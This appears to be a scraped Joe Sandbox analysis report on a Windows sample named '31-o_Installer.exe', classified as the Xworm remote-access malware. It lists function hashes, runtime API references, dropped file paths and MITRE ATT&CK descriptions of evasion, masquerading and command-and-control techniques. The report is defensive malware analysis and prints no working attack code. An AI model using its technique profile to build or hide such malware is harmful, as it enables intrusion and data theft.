Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: c206866f528cdbf3c98229ee44c4ed78264d7313e04fd75c629bc8280a1e02bc
Instruction ID: d58cb21df3d17c01f651340340b2024b9865021530ea5d27b3a22da174780edb
Opcode Fuzzy Hash: c206866f528cdbf3c98229ee44c4ed78264d7313e04fd75c629bc8280a1e02bc
Instruction Fuzzy Hash: 7D11A732E3561AABCB217F74AC09A5A3795AF503B0B314426F89DAF151DE7188F08E91

Function 0026D9A5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0026D9B1

Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC

__getptd.LIBCMT ref: 0026D9C8
__amsg_exit.LIBCMT ref: 0026D9D6
__lock.LIBCMT ref: 0026D9E6
__updatetlocinfoEx_nolock.LIBCMT ref: 0026D9FA

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: f2687e1fe13eed3c4bf719f6251434fc4a4021e774016ff06440763158652f38
Instruction ID: 70e9c13d73b0e8bb0e876330c51549c9f3d4d413da7d4a3f804dbd6859969556
Opcode Fuzzy Hash: f2687e1fe13eed3c4bf719f6251434fc4a4021e774016ff06440763158652f38
Instruction Fuzzy Hash: A3F09032E766199EDF22BF789807B5E73A0AF04720F15410AF418A71C2CB7458E08F96

Function 0026262B Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb7e77362d6674df5be20d237d2e75d97a73f7d96d19382904869181d562428
Instruction ID: 606dadbfd294587343573b881e78c12d35318597fceb8dbf0d1433c8ae8d7895
Opcode Fuzzy Hash: 4cb7e77362d6674df5be20d237d2e75d97a73f7d96d19382904869181d562428
Instruction Fuzzy Hash: 7B517375910A09DFCF15DFA8C9819AEB7F9FF08314B10056EE542A7641D770AE98CB50

Function 00265513 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002655AE
__flush.LIBCMT ref: 002655CC
__write.LIBCMT ref: 002655F3
__flsbuf.LIBCMT ref: 0026561E

Part of subcall function 0026A95F: __getptd_noexit.LIBCMT ref: 0026A95F

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
Instruction ID: 1ba62af85a12a4085fcfc4fb309f32fbeccbe6a0e5a3b8f2b27c4a29b6f00f85
Opcode Fuzzy Hash: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
Instruction Fuzzy Hash: DF41B531A20B259FDB249F69C84969EBBB6AF80360F64852DE45697180D770DDE1CB40

Function 00273BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00273C19
__isleadbyte_l.LIBCMT ref: 00273C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00273C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00273CEB

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 37b564aed1e2170f536935961cc07746a57e2a0679eb6c6c73b115f235917ae6
Instruction ID: 7686f4175956632bb0458713768556cfb23950fe54bb93d96966731eac15587a
Opcode Fuzzy Hash: 37b564aed1e2170f536935961cc07746a57e2a0679eb6c6c73b115f235917ae6
Instruction Fuzzy Hash: 2A31E531A21296EFCB12DF64CC85AB97BB5BF00310F15C56EE069AB191D730DEA0EB50

Function 0026913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00269160

Part of subcall function 00268F8C: __fltout2.LIBCMT ref: 00268FB7

__cftog_l.LIBCMT ref: 00269186
__cftoe_l.LIBCMT ref: 002691B8

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: f26f85fe29bbd64f666d106afb2a0250012dde2b855e10c25d9344d77766fb9e
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: B8114E7602014EBBCF165F88CC45CEE3F2ABB59394B688556FE1859031DB36C9F1AB81

Function 0026168B Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 0026169D
_wprintf.LIBCMT ref: 002616B5
_wprintf.LIBCMT ref: 002616CD
_wprintf.LIBCMT ref: 002616E5

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: _wprintf
String ID:
API String ID: 2738768116-0
Opcode ID: dca0ec3a925c848095cdd86018a67ec393229e59f9fde57faa3eb7a1cd91c1be
Instruction ID: f1f6b6e95c88d63492dd41669365ef23cd2695da17f9b23385db819abb5dec1b
Opcode Fuzzy Hash: dca0ec3a925c848095cdd86018a67ec393229e59f9fde57faa3eb7a1cd91c1be
Instruction Fuzzy Hash: 61F03727D7923129953C31A6A44EE879F08EB03BF47391066BCCCA11D1599158F185D9

Function 002635C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 002635E5

Part of subcall function 002638C7: std::exception::exception.LIBCMT ref: 002638DC
Part of subcall function 002638C7: __CxxThrowException@8.LIBCMT ref: 002638F1

Part of subcall function 00262279: std::_Xinvalid_argument.LIBCPMT ref: 0026228A

_memmove.LIBCMT ref: 00263640

Strings

invalid string position, xrefs: 002635E0

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position
API String ID: 1253240057-1799206989
Opcode ID: 8ee2cfe0e9d89d3644a68b6954e02626328422183d3908979db3e5f4c17c8485
Instruction ID: 1f36bae930cd47a11dce5b3616cba1f45d58d32f46b599f4670075ee1a4e19f1
Opcode Fuzzy Hash: 8ee2cfe0e9d89d3644a68b6954e02626328422183d3908979db3e5f4c17c8485
Instruction Fuzzy Hash: 5C11C832324210ABDB24DE1CD851A5AB3ADEB95720F10052DF91687381CBB1DBE1C799

Function 0026215B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00262171

Part of subcall function 002638C7: std::exception::exception.LIBCMT ref: 002638DC
Part of subcall function 002638C7: __CxxThrowException@8.LIBCMT ref: 002638F1

_memmove.LIBCMT ref: 002621AA

Strings

invalid string position, xrefs: 0026216C

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: df31cc2210c363fd663345982afa4b8484ec9fb2eab8ddc69fe931704cc6d81e
Instruction ID: 9cd38755169cb000f4c6141889aed09a8ffa16d91e2894d23d552476cd6837ed
Opcode Fuzzy Hash: df31cc2210c363fd663345982afa4b8484ec9fb2eab8ddc69fe931704cc6d81e
Instruction Fuzzy Hash: 0B01F931724A41DBD3249E68CCC0916B3AAE7827103204D7CE58587642DBB4ECD987A0

Function 002667E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 002667F4
__invoke_watson.LIBCMT ref: 00266848

Part of subcall function 00266683: _strcat_s.LIBCMT ref: 002666A2

Strings

&k&, xrefs: 002667EA, 002667ED

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: &k&
API String ID: 312943863-2542130385
Opcode ID: 1573c7a8119fdefa43e5e2cf26635de50da048c9222d08e7718ef4f258c85d5d
Instruction ID: 3ac38bf7be485d874f4efb86e9195a446e2391c0a82f6e4ed56cca0ee9218c13
Opcode Fuzzy Hash: 1573c7a8119fdefa43e5e2cf26635de50da048c9222d08e7718ef4f258c85d5d
Instruction Fuzzy Hash: C6F0F0B24203497BDF116EA0CC4AEDB3F5DAF01310F488061FA196A012E7329EB4CBA1

Function 00267AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00264895: __getptd.LIBCMT ref: 0026489B
Part of subcall function 00264895: __getptd.LIBCMT ref: 002648AB

__getptd.LIBCMT ref: 00267AC8

Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC

__getptd.LIBCMT ref: 00267AD6

Strings

csm, xrefs: 00267AE4

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: d78bd3ed5e1c950878e06509f8c3a16ce046dbf5edf1ec5a77987d985e803ce0
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction Fuzzy Hash: 28014B398252068BCF399F36E888ABDB3B5EF24319F28482DE05156661CB3089E0CF01

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 31-o_Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
31-o_Installer.exe

Function 002625C8 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 002611E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Function 00262E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 00262E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 02E6FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 0026297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 02E700CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 00262F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 02E6FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 00265902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Function 0026184B Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Function 05337950 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Function 00262D2E Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Function 00262D33 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Function 053374B0 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON